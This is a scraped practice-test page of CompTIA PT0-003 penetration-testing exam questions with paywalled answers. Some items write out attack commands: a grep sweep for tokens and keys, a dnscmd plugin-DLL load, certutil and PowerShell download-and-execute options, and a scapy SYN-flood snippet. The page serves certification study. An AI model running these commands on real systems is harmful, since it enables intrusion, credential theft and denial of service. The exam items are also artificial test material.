ExamGecko
Login
Home / CompTIA / PT0-003 / List of questions
Ask Question

CompTIA PT0-003 Practice Test - Questions Answers, Page 21

List of questions

Question 201

Report Export Collapse

A penetration tester identifies the following open ports during a network enumeration scan:

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

111/tcp open rpcbind

443/tcp open https

27017/tcp open mongodb

50123/tcp open ms-rpc

Which of the following commands did the tester use to get this output?

Become a Premium Member for full access
  Unlock Premium Member

Question 202

Report Export Collapse

A penetration tester successfully clones a source code repository and then runs the following command:

find . -type f -exec egrep -i 'token|key|login' {} \;

Which of the following is the penetration tester conducting?

Become a Premium Member for full access
  Unlock Premium Member

Question 203

Report Export Collapse

A penetration tester has adversely affected a critical system during an engagement, which could have a material impact on the organization. Which of the following should the penetration tester do to address this issue?

Become a Premium Member for full access
  Unlock Premium Member

Question 204

Report Export Collapse

A tester compromises a target host and then wants to maintain persistent access. Which of the following is the best way for the attacker to accomplish the objective?

Become a Premium Member for full access
  Unlock Premium Member

Question 205

Report Export Collapse

A penetration tester needs to exploit a vulnerability in a wireless network that has weak encryption to perform traffic analysis and decrypt sensitive information. Which of the following techniques would best allow the penetration tester to have access to the sensitive information?

Become a Premium Member for full access
  Unlock Premium Member

Question 206

Report Export Collapse

Which of the following will reduce the possibility of introducing errors or bias in a penetration test report?

Become a Premium Member for full access
  Unlock Premium Member

Question 207

Report Export Collapse

A penetration tester finds an unauthenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is https://target.comptia.org. Which of the following should the tester use to perform the task with the fewest web requests?

Become a Premium Member for full access
  Unlock Premium Member

Question 208

Report Export Collapse

A penetration tester is performing an assessment focused on attacking the authentication identity provider hosted within a cloud provider. During the reconnaissance phase, the tester finds that the system is using OpenID Connect with OAuth and has dynamic registration enabled. Which of the following attacks should the tester try first?

Become a Premium Member for full access
  Unlock Premium Member

Question 209

Report Export Collapse

During an assessment, a penetration tester runs the following command:

dnscmd.exe /config /serverlevelplugindll C:\users\necad-TA\Documents\adduser.dll

Which of the following is the penetration tester trying to achieve?

Become a Premium Member for full access
  Unlock Premium Member

Question 210

Report Export Collapse

A penetration tester runs a network scan but has some issues accurately enumerating the vulnerabilities due to the following error:

OS identification failed

Which of the following is most likely causing this error?

Become a Premium Member for full access
  Unlock Premium Member
Total 214 questions
Go to page: of 22
Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use? https://192.168.0.1/foo.exe A. powershell.exe impo C:\tools\foo.ps1 B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe C. powershell.exe -noni -encode IEX.Downloadstring(' http://172.16.0.1/ ') D. rundll32.exe c:\path\foo.dll,functName</a>
During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the following tools should the tester use?
Which of the following describes the process of determining why a vulnerability scanner is not providing results?
During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?
A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?
Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this task?
A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input: ip = IP('192.168.50.2') tcp = TCP(sport=RandShort(), dport=80, flags='S') raw = RAW(b'X'*1024) p = ip/tcp/raw send(p, loop=1, verbose=0) Which of the following attack types is most likely being used in the test?
A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?
During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network's authentication mechanism to gain unauthorized access to the network. Which of the following attacks would the tester most likely perform to gain access?